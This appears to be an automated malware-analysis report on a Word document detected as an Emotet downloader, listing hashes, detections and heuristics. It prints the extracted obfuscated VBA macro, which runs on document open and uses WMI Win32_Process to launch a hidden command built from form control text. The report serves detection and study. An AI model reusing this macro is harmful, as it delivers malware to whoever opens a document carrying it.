Office (OOXML) malware analysis — malicious · ce1c5a0ca7385133

MALICIOUS

Office (OOXML)

136.2 KB Created: 2020-01-24 06:31:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2022-07-02

MD5: 9c7f062ddbe8cb118238876bc668e9a6 SHA-1: 706e3cc77796b7306ed1ac96fcd9a79fd75f9f6a SHA-256: ce1c5a0ca7385133cc1df7bdfb489ea985fa9b1c732786f70ea5f5fa3f1b5ba4

230 Risk Score

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7561692-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7561692-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set Orlvrvyoyra = GetObject(Vocgbfxyr)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	15700 bytes
SHA-256: `398e422a1db848f9c23a420430c352af1bd766a5458509b8abb6933edd1e03da`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Ydviunrlt" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Call Xkmmnyuojc End Sub Attribute VB_Name = "Yjgtrisu" Attribute VB_Base = "0{5D96B3F5-1890-44A7-8444-FF01B8267DE8}{5675E0B2-D44E-45B8-810A-CC3D86356E17}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Sidlhcjm" Attribute VB_Base = "0{5297D533-12B3-4213-89B1-C1FBAF57D3FC}{E8F10DE1-008D-4AD0-AA5A-BD1E933A5FAA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Uzdnhjxvqnb() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Hqwnduilpgbwz" Attribute VB_Base = "0{7E10DDB9-D08D-4FD7-869B-FEE7D0CE2056}{5D9BB088-E5E0-42E7-AB41-9D2D362C4665}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Anweekuqjzpbx() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Ebwiwulo" Attribute VB_Base = "0{949E005C-FB99-490C-9E25-A67FD21BA68D}{4965CAEA-1C87-4434-BA51-4AE40FD5DFC0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Tcfsbrhzavdq() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Pmannoslkmca" Attribute VB_Base = "0{3D34587A-AE09-44F2-B202-0FAD28C887FF}{2B03790A-8A0A-4FD2-9D77-01543CA79B18}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Obpyqmkipxhi() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Xfzneetj" Attribute VB_Base = "0{FFA34F6D-BD4A-4B81-8079-B36C2F97C44A}{E08D6F68-997C-41A1-8159-78B4E61D9EFE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Arzirsqbrpkyf() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Jhgxcfff" Attribute VB_Base = "0{CD39E573-B6F5-4A1D-8C8F-33E8FC8533B2}{FDF3CA01-0FD6-4D9E-AF91-8D3E6EBD9A2B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Enpvvyfhqxy() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Qxhfrssy" Attribute VB_Base = "0{8DBB0E19-52B2-436B-A5C7-EFC34DA9924D}{66F915F5-C633-452A-A7D8-22EC07A1D2C9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Mvwmlssvljun() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Fvqerohc" Attribute VB_Base = "0{2F596F47-AD7B-4C5C-B999-BED6735D0ECB}{10DFDC44-289C-432B-91E7-C063F37FC10F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Pauznnxpf() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Aymtpycm" Attribute VB_Base = "0{D1719C27-2572-40D7-90DE-A00A42ECE47F}{B4BAB7BB-CA56-486D-AF30-332AE32BFC8F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Drgzwbnhk() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Zrwlxshylf" Attribute VB_Base = "0{F26DDDB1-1095-4583-9BFA-44A147762380}{67ADFEF7-4C09-4972-89D6-B2039EDFEFFD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Yfwelbqepry() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Oarljiuer" Attribute VB_Base = "0{4FEFD7B9-D521-4D98-A887-9FBF8EBDCD2B}{EE53C586-AF82-4A9C-AA50-DE9B3AF65F52}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Pisfunsbv() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Uawcfujvi" Attribute VB_Base = "0{5452F23A-EADD-4725-B897-ABF19A47E090}{74542D2F-4685-49E2-86A0-071F6518AFBB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Djspmcxnjg() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Pcjkkbyxqdf" Attribute VB_Base = "0{8C25F953-368B-401B-8807-E8802F68E8B7}{6017BFF7-FA05-4C25-B834-CEB5D1366DFC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ogczvwspfei() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Aqdivcplh" Attribute VB_Base = "0{85429074-14E9-42CB-9EAC-501A2D902E4B}{76F12119-092B-45F9-9861-EC0FC27BE89D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Kytkutzdmyyv() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Ojmzkyawfbh" Attribute VB_Base = "0{D3AE1644-E97F-4807-B25D-97585A428B5E}{8223A554-5907-43F6-BC0A-3628BE0E4E57}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Hdqfhghpw() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Ulffagcvj" Attribute VB_Base = "0{9A498D59-4F7D-4654-8DC3-148CBA2A17DA}{7FAC2882-5F7D-4EA1-882A-02401F4AE2F0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Tdmwbunts() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Ksawtqon" Attribute VB_Base = "0{7AEF91A6-F825-4981-B889-E4B272CF2797}{5906410E-B6BA-48AE-9D11-F5A1DA52C784}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Fdeysvwzylko() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Mskfmcclft" Attribute VB_Base = "0{12E4A3AD-BA79-47F8-B5DF-3303C5267374}{4A29112B-3359-4527-A6C7-C4AB4E78D595}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Eemmgwvpnzi() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Zqttrqwsqj" Attribute VB_Base = "0{1E0D3BBA-7269-4B58-956F-28020E634339}{8910C2C3-0EC7-4F8E-BB8D-2FD1320D2070}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Jawotylxf() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Mlfotkwnjmwn" Attribute VB_Base = "0{F4A9FFE5-41F5-440D-B437-EAB8AE3F8D82}{FE0C63C8-1A0C-47F4-8E7B-15659243F4E8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Rnceuoulgx() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Btaxacizhhmcd" Attribute VB_Base = "0{0C93528E-C9FE-4236-A379-B7942CB1E56F}{59C55831-DEF1-4A01-A286-9626EC658B78}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Wrtmmkfckitk() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Afhstidmmmtfm" Attribute VB_Base = "0{0A49B2DD-97A0-4BC4-9670-64111C0F447D}{25B4B26A-5BB1-4F58-B3B3-CD9ED0D9BE99}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Babmuxunkj() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Htmjvywworzr" Function Xctwaofxqv() While Ikcwibni = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Nolsnaub = ChrW(owdsd + wdKeyP + kwm) While Sfnqhzyvr = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Zmhhwcpj = Nolsnaub + Yjgtrisu.Qgqpenebvoyb + Yjgtrisu.Dqgnqfkkam While Rdagwbauf = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) omwn = Yjgtrisu.Iuhjwtlyjhsih.ControlTipText Evqxtuplhngg = Split(Zmhhwcpj + StrReverse(omwn), "i_^^najks===///") While Obptgctvkhbqq = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Xctwaofxqv = Join(Evqxtuplhngg, "") While Kfjncdstbzraa = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) End Function Function Xkmmnyuojc() mdnuuw = "i_^^najks===///i_^^najks===///ii_^^najks===///ni_^^najks===///mi_^^najks===///gi_^^najks===///mti_^^najks===///" + ChrW(nsiq + wdKeyS + ienosmc) + ":i_^^najks===///i_^^najks===///wii_^^najks===///i_^^najks===///n3i_^^najks===///2_i_^^najks===///i_^^najks===///" + Yjgtrisu.Sffefojentw + "i_^^najks===///roci_^^najks===///i_^^najks===///esi_^^najks===///si_^^najks===///i_^^najks===///" While Gkrlscpxgyl = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) ienloqw = "i_^^najks===///" While Tmouwojcez = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Vujybgswmj = Split("i_^^najks===///wi_^^najks===///i_^^najks===///i_^^najks===///" + mdnuuw + mmnnnsde, ienloqw) While Qjelydni = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Vocgbfxyr = Join(Vujybgswmj, "") While Ftberxsvtjrj = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Set Orlvrvyoyra = GetObject(Vocgbfxyr) While Lzaqhpqpozzz = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Ztkiunutors = Yjgtrisu.Qjdkansmw.Tag Ntbfxnfv = Vocgbfxyr + ChrW(mmsnu + wdKeyS) + Yjgtrisu.Ttwzfldnhy.Tag + Ztkiunutors While Tgiikidiqf = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Ysaimckfwkx = Ntbfxnfv + Yjgtrisu.Sffefojentw While Drcfbtmwvkbp = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Set Xkmmnyuojc = GetObject(Ysaimckfwkx) While Errpmxicqqj = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Xkmmnyuojc. _ SHoWwiNDow! = False While Adrdaibr = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Do While Orlvrvyoyra. _ Create(mxuws & Xctwaofxqv, Ncptlnvkx, Xkmmnyuojc, Posdiywfwf, Uquyuxkoix, Qsjvfkkif, Nlyjmnzq, Tvdrpbmm, Rpnmppbam, Dymgmvoy) Loop While Hscebskj = 1 Cnug1 = tjOFbl4A6 / zMb - (3 / CInt(kzre2J8) * cGRmgD7 / 8) Wend zfPjZp5W1 = YZv - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fYLCG1 / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	115200 bytes
SHA-256: `f7291e9d9c23592bfd082c8c473dd6dd88f28033651519a6b1cc040fbc878604`
Detection ClamAV: Doc.Downloader.Emotet-7561692-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.